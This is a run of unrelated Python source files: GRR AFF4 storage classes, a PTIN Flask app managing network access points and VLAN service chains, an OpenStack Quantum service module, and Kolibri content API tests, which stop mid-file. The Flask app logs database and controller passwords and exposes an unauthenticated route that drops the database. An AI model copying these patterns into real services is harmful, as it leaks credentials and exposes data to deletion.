containing arrays of hashes.") FINALIZED = aff4.Attribute("aff4:finalized", rdfvalue.RDFBool, "Once a blobimage is finalized, further writes" " will raise exceptions.") class HashImage(aff4.AFF4Image): """An AFF4 Image which refers to chunks by their hash. This object stores a large image in chunks. Each chunk is stored using its hash in the AFF4 data store. We have an index with a series of hashes stored back to back. When we need to read a chunk, we seek the index for the hash, and then open the data blob indexed by this hash. Chunks are cached as per the AFF4Image implementation. Assumptions: Hashes do not collide. All data blobs have the same size (the chunk size), except possibly the last one in the file. """ # Size of a sha256 hash _HASH_SIZE = 32 # How many chunks we read ahead _READAHEAD = 5 _data_dirty = False def Initialize(self): super(HashImage, self).Initialize() self.index = None def _OpenIndex(self): if self.index is None: index_urn = self.urn.Add("index") self.index = aff4.FACTORY.Create(index_urn, "AFF4Image", mode=self.mode, token=self.token) def _GetChunkForWriting(self, chunk): """Chunks must be added using the AddBlob() method.""" raise NotImplementedError("Direct writing of HashImage not allowed.") def _GetChunkForReading(self, chunk): """Retrieve the relevant blob from the AFF4 data store or cache.""" result = None self._OpenIndex() self.index.Seek(chunk * self._HASH_SIZE) chunk_name = self.index.Read(self._HASH_SIZE) try: result = self.chunk_cache.Get(chunk_name) except KeyError: # Read ahead a few chunks. self.index.Seek(-self._HASH_SIZE, whence=1) readahead = {} for _ in range(self._READAHEAD): name = self.index.Read(self._HASH_SIZE) if name and name not in self.chunk_cache: urn = aff4.ROOT_URN.Add("blobs").Add(name.encode("hex")) readahead[urn] = name fds = aff4.FACTORY.MultiOpen(readahead, mode="r", token=self.token) for fd in fds: name = readahead[fd.urn] # Remember the right fd if name == chunk_name: result = fd # Put back into the cache self.chunk_cache.Put(readahead[fd.urn], fd) return result def Close(self, sync=True): if self._data_dirty: self.Set(self.Schema.SIZE(self.size)) if self.index: self.index.Close(sync) super(HashImage, self).Close(sync) def AddBlob(self, blob_hash, length): """Add another blob to this image using its hash.""" self._OpenIndex() self._data_dirty = True self.index.Seek(0, 2) self.index.Write(blob_hash) self.size += length class SchemaCls(aff4.AFF4Image.SchemaCls): """The schema for AFF4 files in the GRR VFS.""" STAT = aff4.AFF4Object.VFSDirectory.SchemaCls.STAT CONTENT_LOCK = aff4.Attribute( "aff4:content_lock", rdfvalue.RDFURN, "This lock contains a URN pointing to the flow that is currently " "updating this object.") FINGERPRINT = aff4.Attribute("aff4:fingerprint", rdfvalue.FingerprintResponse, "Protodict containing arrays of hashes.") class AFF4Index(aff4.AFF4Object): """An aff4 object which manages access to an index. This object has no actual attributes, it simply manages the index. """ # Value to put in the cell for index hits. PLACEHOLDER_VALUE = "X" def __init__(self, urn, **kwargs): # Never read anything directly from the table by forcing an empty clone. kwargs["clone"] = {} super(AFF4Index, self).__init__(urn, **kwargs) # We collect index data here until we flush. self.to_set = set() self.to_delete = set() def Flush(self, sync=False): """Flush the data to the index.""" super(AFF4Index, self).Flush(sync=sync) # Remove entries from deletion set that are going to be added anyway. self.to_delete = self.to_delete.difference(self.to_set) # Convert sets into dicts that MultiSet handles. to_delete = dict(zip(self.to_delete, self.PLACEHOLDER_VALUE*len(self.to_delete))) to_set = dict(zip(self.to_set, self.PLACEHOLDER_VALUE*len(self.to_set))) data_store.DB.MultiSet(self.urn, to_set, to_delete=to_delete, token=self.token, replace=True, sync=sync) self.to_set = set() self.to_delete = set() def Close(self, sync=False): self.Flush(sync=sync) super(AFF4Index, self).Close(sync=sync) def Add(self, urn, attribute, value): """Add the attribute of an AFF4 object to the index. Args: urn: The URN of the AFF4 object this attribute belongs to. attribute: The attribute to add to the index. value: The value of the attribute to index. Raises: RuntimeError: If a bad URN is passed in. """ if not isinstance(urn, rdfvalue.RDFURN): raise RuntimeError("Bad urn parameter for index addition.") column_name = "index:%s:%s:%s" % ( attribute.predicate, value.lower(), urn) self.to_set.add(column_name) def Query(self, attributes, regex, limit=100): """Query the index for the attribute. Args: attributes: A list of attributes to query for. regex: The regex to search this attribute. limit: A (start, length) tuple of integers representing subjects to return. Useful for paging. If its a single integer we take it as the length limit (start=0). Returns: A list of RDFURNs which match the index search. """ # Make the regular expressions. regexes = ["index:%s:%s:.*" % (a.predicate, regex.lower()) for a in attributes] start = 0 try: start, length = limit except TypeError: length = limit # Get all the hits index_hits = set() for col, _, _ in data_store.DB.ResolveRegex( self.urn, regexes, token=self.token, timestamp=data_store.DB.ALL_TIMESTAMPS): # Extract URN from the column_name. index_hits.add(rdfvalue.RDFURN(col.rsplit("aff4:/", 1)[1])) hits = [] for i, hit in enumerate(index_hits): if i < start: continue hits.append(hit) if i >= start + length - 1: break return hits def _QueryRaw(self, regex): return set([(x, y) for (y, x, _) in data_store.DB.ResolveRegex( self.urn, regex, token=self.token, timestamp=data_store.DB.ALL_TIMESTAMPS)]) def DeleteAttributeIndexesForURN(self, attribute, value, urn): """Remove all entries for a given attribute referring to a specific urn.""" if not isinstance(urn, rdfvalue.RDFURN): raise RuntimeError("Bad urn parameter for index deletion.") column_name = "index:%s:%s:%s" % ( attribute.predicate, value.lower(), urn) self.to_delete.add(column_name) class TempFile(aff4.AFF4MemoryStream): """A temporary file (with a random URN) to store an RDFValue.""" def __init__(self, urn, **kwargs): if urn is None: urn = rdfvalue.RDFURN("aff4:/tmp").Add("%X" % utils.PRNG.GetULong()) super(TempFile, self).__init__(urn, **kwargs)
''' Copyright 2014-2016 PTIN Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import logging import configparser from flask import Flask, request, jsonify from vtn import VtnWrapper from database.database import db import database.nap as nap import database.nfvi as nfvi import database.service as service from sqlalchemy.exc import IntegrityError logger = logging.getLogger() logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s - ' '%(levelname)s - %(message)s')) config = configparser.ConfigParser() config.read('./wicm.ini') if not config.getboolean('default', 'verbose'): logger.setLevel(logging.INFO) logger.info('Starting..') mysql_connect = 'mysql+mysqlconnector://{}:{}@{}:{}/{}'.format( config.get('database', 'username'), config.get('database', 'password'), config.get('database', 'host'), config.getint('database', 'port'), config.get('database', 'name') ) logger.debug('Database connection string: {}'.format(mysql_connect)) logger.debug('OpenDaylight connection {}:{}@{}:{}'.format( config.get('opendaylight', 'host'), config.getint('opendaylight', 'port'), config.get('opendaylight', 'username'), config.get('opendaylight', 'password') )) vtn = VtnWrapper( config.get('opendaylight', 'host'), config.get('opendaylight', 'port'), config.get('opendaylight', 'username'), config.get('opendaylight', 'password') ) app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = mysql_connect app.config['SQLALCHEMY_POOL_RECYCLE'] = 299 # compatibility with MariaDB db.init_app(app) @app.route('/nap', methods=['POST', 'GET', 'DELETE'], strict_slashes=False) @app.route('/nap/<string:mkt_id>', methods=['GET', 'DELETE'], strict_slashes=False) def nap_request(mkt_id=None): if request.method == 'POST': nap_request = request.json logger.info('Request to create NAP: {}'.format(nap_request)) client_mkt_id = nap_request['nap']['client_mkt_id'] mkt_id = nap_request['nap']['mkt_id'] ce = (nap_request['nap']['switch'], nap_request['nap']['ce_port'], nap_request['nap']['ce_transport']['vlan_id']) pe = (nap_request['nap']['switch'], nap_request['nap']['pe_port'], nap_request['nap']['pe_transport']['vlan_id']) result = jsonify({'inserted': nap.put(client_mkt_id, mkt_id, ce, pe)}), 201 vtn.nap_create(client_mkt_id, mkt_id, ce, pe) elif request.method == 'DELETE': logger.info('Request to delete NAP: {}'.format( 'id -> {}'.format(mkt_id) if mkt_id else 'All NAPs')) nap_info = nap.get(mkt_id) result = nap.delete(mkt_id) vtn.nap_delete(nap_info[0]['client_mkt_id'], nap_info[0]['mkt_id']) result = jsonify({'deleted': result}), 200 else: logger.info('Request to get NAP: {}'.format( 'id -> {}'.format(mkt_id) if mkt_id else 'All NAPs')) result = jsonify({'naps': nap.get(mkt_id)}), 200 return result @app.route('/nfvi', methods=['POST', 'GET', 'DELETE'], strict_slashes=False) @app.route('/nfvi/<string:mkt_id>', methods=['GET', 'DELETE'], strict_slashes=False) def nfvi_request(mkt_id=None): if request.method == 'POST': nfvi_request = request.json logger.info('Request to create NFVI-POP: {}'.format(nfvi_request)) mkt_id = nfvi_request['nfvi']['mkt_id'] port = (nfvi_request['nfvi']['switch'], nfvi_request['nfvi']['port']) result = jsonify({'inserted': nfvi.put(mkt_id, port)}), 201 elif request.method == 'DELETE': # TODO: Delete bridge @ ODL! logger.info('Request to delete NFVI-POP: {}'.format( 'id -> {}'.format(mkt_id) if mkt_id else 'All NFVI-PoPs')) result = jsonify({'deleted': nfvi.delete(mkt_id)}), 200 else: logger.info('Request to get NFVI-POP: {}'.format( 'id -> {}'.format(mkt_id) if mkt_id else 'All NFVI-PoPs')) result = jsonify({'nfvis': nfvi.get(mkt_id)}), 200 return result @app.route('/vnf-connectivity', methods=['POST'], strict_slashes=False) def service_request_post(): try: service_request = request.json logger.info('Request to create service: {}'.format(service_request)) ns_instance_id = service_request['service']['ns_instance_id'] client_mkt_id = service_request['service']['client_mkt_id'] nap_id = service_request['service']['nap_mkt_id'] ce_pe_nfvi_ids = service_request['service']['ce_pe'] pe_ce_nfvi_ids = service_request['service']['pe_ce'] allocated = service.post(client_mkt_id, ns_instance_id, nap_id, ce_pe_nfvi_ids, pe_ce_nfvi_ids) except KeyError as ex: logger.error('Request to create service failed: must include {}' .format(str(ex))) return jsonify({'error': 'Request must include {:s}'. format(str(ex))}), 400 except AttributeError: logger.error('Request to create service failed: Bad value for ' 'nap_mkt_id or nfvi_mkt_id') return jsonify({'error': 'Bad value for nap_mkt_id or nfvi_mkt_id'}),\ 400 except IndexError: logger.error('Request to create service failed: No Vlans!') return jsonify({'error': 'No vlans available'}), 500 except IntegrityError: logger.error('Request to create service failed:' 'ns_instance_id {} already in use!'.format(ns_instance_id)) return jsonify({'error': 'ns_instance_id "{}" already in use!' .format(ns_instance_id)}), 400 log_string = '' result = {'allocated': { 'ns_instance_id': ns_instance_id, 'ce_pe': [], 'pe_ce': [], }} log_string += 'ce_pe: ' for hop in allocated['ce_pe']: log_string += 'nfvi_id: "{}" vlan_id: "{}"'.\ format(hop['nfvi_mkt_id'], hop['vlan_id']) result['allocated']['ce_pe'].append({ 'nfvi_id': hop['nfvi_mkt_id'], 'transport': { 'type': 'vlan', 'vlan_id': hop['vlan_id'], }}) log_string += 'pe_ce: ' for hop in allocated['pe_ce']: log_string += 'nfvi_id: "{}" vlan_id: "{}"'.\ format(hop['nfvi_mkt_id'], hop['vlan_id']) result['allocated']['pe_ce'].append({ 'nfvi_id': hop['nfvi_mkt_id'], 'transport': { 'type': 'vlan', 'vlan_id': hop['vlan_id'], }}) logger.info('Allocated vlans\n{}\n'.format(log_string)) return jsonify(result), 201 @app.route('/vnf-connectivity', methods=['GET'], strict_slashes=False) @app.route('/vnf-connectivity/<string:ns_instance_id>', methods=['GET'], strict_slashes=False) def service_request_get(ns_instance_id=None): logger.info('Request to get Service: {}'.format('id -> {}'.format( ns_instance_id) if ns_instance_id else 'All Services')) return jsonify({'services': service.get(ns_instance_id)}), 200 @app.route('/vnf-connectivity/<string:ns_instance_id>', methods=['PUT'], strict_slashes=False) def service_request_put(ns_instance_id=None): try: logger.info('Request enable Service: {}'.format(ns_instance_id)) service_info = service.get(ns_instance_id)[0] except Exception: logger.error('Request enable Service {} failed : Service not found' .format(ns_instance_id)) return jsonify({'error': 'Service {} not found!' .format(ns_instance_id)}), 400 if service_info['status'] != 'ALLOCATED': logger.error(('Request enable Service {} failed : Service ' 'not in ALLOCATED state').format(ns_instance_id)) return jsonify({'error': 'Service {} is not in ALLOCATED state!' .format(ns_instance_id)}), 400 try: ce_pe = [] for hop in service_info['ce_pe']: nfvi_info = nfvi.get(hop['nfvi_mkt_id'])[0] ce_pe.append(((nfvi_info['switch'], nfvi_info['port'], hop['transport']['vlan_id']))) pe_ce = [] for hop in service_info['pe_ce']: nfvi_info = nfvi.get(hop['nfvi_mkt_id'])[0] pe_ce.append(((nfvi_info['switch'], nfvi_info['port'], hop['transport']['vlan_id']))) vtn.chain_create(service_info['client_mkt_id'], service_info['ns_instance_id'], service_info['nap_mkt_id'], ce_pe, pe_ce) except Exception as ex: logger.error('Request enable Service {} failed VTN Manager: {}' .format(ns_instance_id, ex)) return jsonify({'error': 'Unable to put redirection in place!'}), 500 logger.info('Service: {} enabled!'.format(ns_instance_id)) service.set_status(ns_instance_id, 'ACTIVE') return jsonify({'activated': {'ns_instance_id': ns_instance_id}}), 201 @app.route('/vnf-connectivity/<string:ns_instance_id>', methods=['DELETE'], strict_slashes=False) def service_request_delete(ns_instance_id=None): try: logger.info('Request delete Service: {}'.format(ns_instance_id)) service_info = service.get(ns_instance_id)[0] except Exception: logger.error('Request delete Service {} failed : Service not found' .format(ns_instance_id)) return jsonify({'error': 'Service {} not found!' .format(ns_instance_id)}), 400 if service_info['status'] not in ['ALLOCATED', 'ACTIVE']: logger.error(('Request delete Service {} failed : Service' 'not in deletable state').format(ns_instance_id)) return jsonify({'error': 'Service {} is not in deletable state!' .format(ns_instance_id)}), 400 service.set_status(ns_instance_id, 'TERMINATING') if service_info['status'] == 'ACTIVE': vtn.chain_delete(service_info['client_mkt_id'], ns_instance_id, service_info['nap_mkt_id']) service.delete_service(ns_instance_id) logger.info('Service: {} deleted!'.format(ns_instance_id)) return jsonify({'deleted': {'ns_instance_id': ns_instance_id}}), 200 @app.route('/reset_db', methods=['DELETE']) def reset_db(): logger.info('Request to delete the database!') db.drop_all() db.create_all() return 'ok', 200 @app.route("/") def hello(): logger.info('ola!') return "WICM!!"
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 Nicira Networks, Inc # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import inspect import logging as std_logging import os import random from oslo.config import cfg from quantum.common import config from quantum import context from quantum.openstack.common import importutils from quantum.openstack.common import log as logging from quantum.openstack.common import loopingcall from quantum.openstack.common.rpc import service from quantum import wsgi LOG = logging.getLogger(__name__) service_opts = [ cfg.IntOpt('periodic_interval', default=40, help=_('Seconds between running periodic tasks')), cfg.IntOpt('periodic_fuzzy_delay', default=5, help=_('range of seconds to randomly delay when starting the' ' periodic task scheduler to reduce stampeding.' ' (Disable by setting to 0)')), ] CONF = cfg.CONF CONF.register_opts(service_opts) LOG = logging.getLogger(__name__) class WsgiService(object): """Base class for WSGI based services. For each api you define, you must also define these flags: :<api>_listen: The address on which to listen :<api>_listen_port: The port on which to listen """ def __init__(self, app_name): self.app_name = app_name self.wsgi_app = None def start(self): self.wsgi_app = _run_wsgi(self.app_name) def wait(self): self.wsgi_app.wait() class QuantumApiService(WsgiService): """Class for quantum-api service.""" @classmethod def create(cls): app_name = "quantum" # Setup logging early, supplying both the CLI options and the # configuration mapping from the config file # We only update the conf dict for the verbose and debug # flags. Everything else must be set up in the conf file... # Log the options used when starting if we're in debug mode... config.setup_logging(cfg.CONF) # Dump the initial option values cfg.CONF.log_opt_values(LOG, std_logging.DEBUG) service = cls(app_name) return service def serve_wsgi(cls): try: service = cls.create() except Exception: LOG.exception(_('In WsgiService.create()')) raise service.start() return service def _run_wsgi(app_name): app = config.load_paste_app(app_name) if not app: LOG.error(_('No known API applications configured.')) return server = wsgi.Server("Quantum") server.start(app, cfg.CONF.bind_port, cfg.CONF.bind_host) # Dump all option values here after all options are parsed cfg.CONF.log_opt_values(LOG, std_logging.DEBUG) LOG.info(_("Quantum service started, listening on %(host)s:%(port)s"), {'host': cfg.CONF.bind_host, 'port': cfg.CONF.bind_port}) return server class Service(service.Service): """Service object for binaries running on hosts. A service takes a manager and enables rpc by listening to queues based on topic. It also periodically runs tasks on the manager.""" def __init__(self, host, binary, topic, manager, report_interval=None, periodic_interval=None, periodic_fuzzy_delay=None, *args, **kwargs): self.binary = binary self.manager_class_name = manager manager_class = importutils.import_class(self.manager_class_name) self.manager = manager_class(host=host, *args, **kwargs) self.report_interval = report_interval self.periodic_interval = periodic_interval self.periodic_fuzzy_delay = periodic_fuzzy_delay self.saved_args, self.saved_kwargs = args, kwargs self.timers = [] super(Service, self).__init__(host, topic, manager=self.manager) def start(self): self.manager.init_host() super(Service, self).start() if self.report_interval: pulse = loopingcall.LoopingCall(self.report_state) pulse.start(interval=self.report_interval, initial_delay=self.report_interval) self.timers.append(pulse) if self.periodic_interval: if self.periodic_fuzzy_delay: initial_delay = random.randint(0, self.periodic_fuzzy_delay) else: initial_delay = None periodic = loopingcall.LoopingCall(self.periodic_tasks) periodic.start(interval=self.periodic_interval, initial_delay=initial_delay) self.timers.append(periodic) self.manager.after_start() def __getattr__(self, key): manager = self.__dict__.get('manager', None) return getattr(manager, key) @classmethod def create(cls, host=None, binary=None, topic=None, manager=None, report_interval=None, periodic_interval=None, periodic_fuzzy_delay=None): """Instantiates class and passes back application object. :param host: defaults to CONF.host :param binary: defaults to basename of executable :param topic: defaults to bin_name - 'nova-' part :param manager: defaults to CONF.<topic>_manager :param report_interval: defaults to CONF.report_interval :param periodic_interval: defaults to CONF.periodic_interval :param periodic_fuzzy_delay: defaults to CONF.periodic_fuzzy_delay """ if not host: host = CONF.host if not binary: binary = os.path.basename(inspect.stack()[-1][1]) if not topic: topic = binary.rpartition('quantum-')[2] topic = topic.replace("-", "_") if not manager: manager = CONF.get('%s_manager' % topic, None) if report_interval is None: report_interval = CONF.report_interval if periodic_interval is None: periodic_interval = CONF.periodic_interval if periodic_fuzzy_delay is None: periodic_fuzzy_delay = CONF.periodic_fuzzy_delay service_obj = cls(host, binary, topic, manager, report_interval=report_interval, periodic_interval=periodic_interval, periodic_fuzzy_delay=periodic_fuzzy_delay) return service_obj def kill(self): """Destroy the service object.""" self.stop() def stop(self): super(Service, self).stop() for x in self.timers: try: x.stop() except Exception: LOG.exception(_("Exception occurs when timer stops")) pass self.timers = [] def wait(self): super(Service, self).wait() for x in self.timers: try: x.wait() except Exception: LOG.exception(_("Exception occurs when waiting for timer")) pass def periodic_tasks(self, raise_on_error=False): """Tasks to be run at a periodic interval.""" ctxt = context.get_admin_context() self.manager.periodic_tasks(ctxt, raise_on_error=raise_on_error) def report_state(self): """Update the state of this service.""" # Todo(gongysh) report state to quantum server pass
""" To run this test, type this in command line <kolibri manage test -- kolibri.content> """ import datetime import uuid from collections import namedtuple import mock import requests from django.core.cache import cache from django.core.urlresolvers import reverse from django.db.models import Q from django.utils import timezone from le_utils.constants import content_kinds from rest_framework import status from rest_framework.test import APITestCase import kolibri.content.serializers from kolibri.auth.models import Facility from kolibri.auth.models import FacilityUser from kolibri.auth.test.helpers import provision_device from kolibri.content import models as content from kolibri.core.device.models import DevicePermissions from kolibri.core.device.models import DeviceSettings from kolibri.core.exams.models import Exam from kolibri.core.lessons.models import Lesson from kolibri.logger.models import ContentSessionLog from kolibri.logger.models import ContentSummaryLog DUMMY_PASSWORD = "password" class ContentNodeTestBase(object): """ Basecase for content metadata methods """ def test_get_prerequisites_for(self): """ test the directional characteristic of prerequisite relationship """ c1 = content.ContentNode.objects.get(title="c1") root = content.ContentNode.objects.get(title="root") # if root is the prerequisite of c1 expected_output = content.ContentNode.objects.filter(title__in=["root"]) actual_output = content.ContentNode.objects.filter(prerequisite_for=c1) self.assertEqual(set(expected_output), set(actual_output)) # then c1 should not be the prerequisite of root unexpected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = content.ContentNode.objects.filter(prerequisite_for=root) self.assertNotEqual(set(actual_output), set(unexpected_output)) def test_get_has_prerequisites(self): """ test the directional characteristic of prerequisite relationship """ c1 = content.ContentNode.objects.get(title="c1") root = content.ContentNode.objects.get(title="root") # if root is the prerequisite of c1 expected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = content.ContentNode.objects.filter(has_prerequisite=root) self.assertEqual(set(expected_output), set(actual_output)) # then c1 should not be the prerequisite of root unexpected_output = content.ContentNode.objects.filter(title__in=["root"]) actual_output = content.ContentNode.objects.filter(has_prerequisite=c1) self.assertNotEqual(set(actual_output), set(unexpected_output)) def test_get_all_related(self): """ test the nondirectional characteristic of related relationship """ c1 = content.ContentNode.objects.get(title="c1") c2 = content.ContentNode.objects.get(title="c2") # if c1 is related to c2 expected_output = content.ContentNode.objects.filter(title__in=["c2"]) actual_output = content.ContentNode.objects.filter(related=c1) self.assertEqual(set(expected_output), set(actual_output)) # then c2 should be related to c1 expected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = content.ContentNode.objects.filter(related=c2) self.assertEqual(set(expected_output), set(actual_output)) def test_descendants_of_kind(self): p = content.ContentNode.objects.get(title="root") expected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = p.get_descendants(include_self=False).filter(kind=content_kinds.VIDEO) self.assertEqual(set(expected_output), set(actual_output)) def test_get_top_level_topics(self): p = content.ContentNode.objects.get(title="root") expected_output = content.ContentNode.objects.filter(parent=p, kind=content_kinds.TOPIC) actual_output = content.ContentNode.objects.get(title="root").get_children().filter(kind=content_kinds.TOPIC) self.assertEqual(set(expected_output), set(actual_output)) def test_tag_str(self): # test for ContentTag __str__ p = content.ContentTag.objects.get(tag_name="tag_2") self.assertEqual(str(p), 'tag_2') def test_lang_str(self): # test for Language __str__ p = content.Language.objects.get(lang_code="en") self.assertEqual(str(p), 'English-Test') def test_channelmetadata_str(self): # test for ChannelMetadata __str__ p = content.ChannelMetadata.objects.get(name="testing") self.assertEqual(str(p), 'testing') def test_tags(self): root_tag_count = content.ContentNode.objects.get(title='root').tags.count() self.assertEqual(root_tag_count, 3) c1_tag_count = content.ContentNode.objects.get(title='c1').tags.count() self.assertEqual(c1_tag_count, 1) c2_tag_count = content.ContentNode.objects.get(title='c2').tags.count() self.assertEqual(c2_tag_count, 1) c2c1_tag_count = content.ContentNode.objects.get(title='c2c1').tags.count() self.assertEqual(c2c1_tag_count, 0) def test_local_files(self): self.assertTrue(content.LocalFile.objects.filter(id='9f9438fe6b0d42dd8e913d7d04cfb2b2').exists()) self.assertTrue(content.LocalFile.objects.filter(id='725257a0570044acbd59f8cf6a68b2be').exists()) self.assertTrue(content.LocalFile.objects.filter(id='e00699f859624e0f875ac6fe1e13d648').exists()) self.assertTrue(content.LocalFile.objects.filter(id='4c30dc7619f74f97ae2ccd4fffd09bf2').exists()) self.assertTrue(content.LocalFile.objects.filter(id='8ad3fffedf144cba9492e16daec1e39a').exists()) def test_delete_tree(self): channel = content.ChannelMetadata.objects.first() channel_id = channel.id channel.delete_content_tree_and_files() self.assertFalse(content.ContentNode.objects.filter(channel_id=channel_id).exists()) self.assertFalse(content.File.objects.all().exists()) class ContentNodeAPITestCase(APITestCase): """ Testcase for content API methods """ fixtures = ['content_test.json'] the_channel_id = '6199dde695db4ee4ab392222d5af1e5c' def setUp(self): provision_device() self.facility = Facility.objects.create(name='facility') self.admin = FacilityUser.objects.create(username='admin', facility=self.facility) self.admin.set_password(DUMMY_PASSWORD) self.admin.save() self.facility.add_admin(self.admin) def _reverse_channel_url(self, pattern_name, kwargs={}): """Helper method to reverse a URL using the current channel ID""" return reverse(pattern_name, kwargs=kwargs) def test_prerequisite_for_filter(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"prerequisite_for": c1_id}) self.assertEqual(response.data[0]['title'], 'root') def test_has_prerequisite_filter(self): root_id = content.ContentNode.objects.get(title="root").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"has_prerequisite": root_id}) self.assertEqual(response.data[0]['title'], 'c1') def test_related_filter(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"related": c1_id}) self.assertEqual(response.data[0]['title'], 'c2') def test_contentnode_list(self): root = content.ContentNode.objects.get(title="root") expected_output = root.get_descendants(include_self=True).filter(available=True).count() response = self.client.get(self._reverse_channel_url("contentnode-list")) self.assertEqual(len(response.data), expected_output) def test_contentnode_granular_network_import(self): c1_id = content.ContentNode.objects.get(title="root").id c2_id = content.ContentNode.objects.get(title="c1").id c3_id = content.ContentNode.objects.get(title="c2").id content.ContentNode.objects.all().update(available=False) response = self.client.get(reverse("contentnode_granular-detail", kwargs={"pk": c1_id})) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "root", "kind": "topic", "available": False, "total_resources": 1, "on_device_resources": 0, "coach_content": False, "importable": True, "num_coach_contents": 0, "children": [ { "pk": c2_id, "id": c2_id, "title": "c1", "kind": "video", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, }, { "pk": c3_id, "id": c3_id, "title": "c2", "kind": "topic", "available": False, "total_resources": 0, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, } ] } ) @mock.patch('kolibri.content.serializers.get_mounted_drives_with_channel_info') def test_contentnode_granular_local_import(self, drive_mock): DriveData = namedtuple("DriveData", ["id", "datafolder"]) drive_mock.return_value = {"123": DriveData(id="123", datafolder="test/")} content.LocalFile.objects.update(available=False) content.ContentNode.objects.update(available=False) c1_id = content.ContentNode.objects.get(title="root").id c2_id = content.ContentNode.objects.get(title="c1").id c3_id = content.ContentNode.objects.get(title="c2").id response = self.client.get( reverse("contentnode_granular-detail", kwargs={"pk": c1_id}), {"importing_from_drive_id": "123"}) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "root", "kind": "topic", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, "children": [ { "pk": c2_id, "id": c2_id, "title": "c1", "kind": "video", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": False, "coach_content": False, "num_coach_contents": 0, }, { "pk": c3_id, "id": c3_id, "title": "c2", "kind": "topic", "available": False, "total_resources": 0, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, } ] } ) def test_contentnode_granular_export_available(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(reverse("contentnode_granular-detail", kwargs={"pk": c1_id})) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "c1", "kind": "video", "available": True, "total_resources": 1, "on_device_resources": 1, "importable": True, "children": [], "coach_content": False, "num_coach_contents": 0, } ) def test_contentnode_granular_export_unavailable(self): c1_id = content.ContentNode.objects.get(title="c1").id content.ContentNode.objects.filter(title="c1").update(available=False) response = self.client.get(reverse("contentnode_granular-detail", kwargs={"pk": c1_id})) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "c1", "kind": "video", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": True, "children": [], "coach_content": False, "num_coach_contents": 0, } ) def test_contentnodefilesize_resourcenode(self): c1_id = content.ContentNode.objects.get(title="c1").id content.LocalFile.objects.filter(pk="6bdfea4a01830fdd4a585181c0b8068c").update(file_size=2) content.LocalFile.objects.filter(pk="211523265f53825b82f70ba19218a02e").update(file_size=1, available=False) response = self.client.get(reverse("contentnodefilesize-detail", kwargs={"pk": c1_id})) self.assertEqual(response.data, {"total_file_size": 3, "on_device_file_size": 2}) def test_contentnodefilesize_topicnode(self): root_id = content.ContentNode.objects.get(title="root").id content.LocalFile.objects.filter(pk="6bdfea4a01830fdd4a585181c0b8068c").update(file_size=2) content.LocalFile.objects.filter(pk="211523265f53825b82f70ba19218a02e").update(file_size=1, available=False) content.LocalFile.objects.filter(pk="e00699f859624e0f875ac6fe1e13d648").update(file_size=3) response = self.client.get(reverse("contentnodefilesize-detail", kwargs={"pk": root_id})) self.assertEqual(response.data, {"total_file_size": 6, "on_device_file_size": 2}) def test_contentnode_retrieve(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-detail", {'pk': c1_id})) self.assertEqual(response.data['pk'], c1_id.__str__()) def test_contentnode_field_filtering(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-detail", {'pk': c1_id}), data={"fields": "title,description"}) self.assertEqual(response.data['title'], "c1") self.assertEqual(response.data['description'], "balbla2") self.assertTrue("pk" not in response.data) def test_contentnode_recommendations(self): id = content.ContentNode.objects.get(title="c2c2").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"recommendations_for": id}) self.assertEqual(len(response.data), 2) def test_contentnode_recommendations_does_not_error_for_unavailable_node(self): node = content.ContentNode.objects.get(title="c2c2") node.available = False node.save() id = node.id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"recommendations_for": id}) self.assertEqual(len(response.data), 2) def test_contentnode_allcontent(self): nodes = content.ContentNode.objects.exclude(kind=content_kinds.TOPIC).filter(available=True).count() response = self.client.get(self._reverse_channel_url("contentnode-all-content")) self.assertEqual(len(response.data), nodes) def test_channelmetadata_list(self): response = self.client.get(reverse("channel-list", kwargs={})) self.assertEqual(response.data[0]['name'], 'testing') def test_channelmetadata_retrieve(self): data = content.ChannelMetadata.objects.values()[0] response = self.client.get(reverse("channel-detail", kwargs={'pk': data["id"]})) self.assertEqual(response.data['name'], 'testing') def test_channelmetadata_resource_info(self): data = content.ChannelMetadata.objects.values()[0] c1_id = content.ContentNode.objects.get(title="c1").id content.ContentNode.objects.filter(pk=c1_id).update(available=False) get_params = {'include_fields': 'total_resources,total_file_size,on_device_resources,on_device_file_size'} response = self.client.get(reverse("channel-detail", 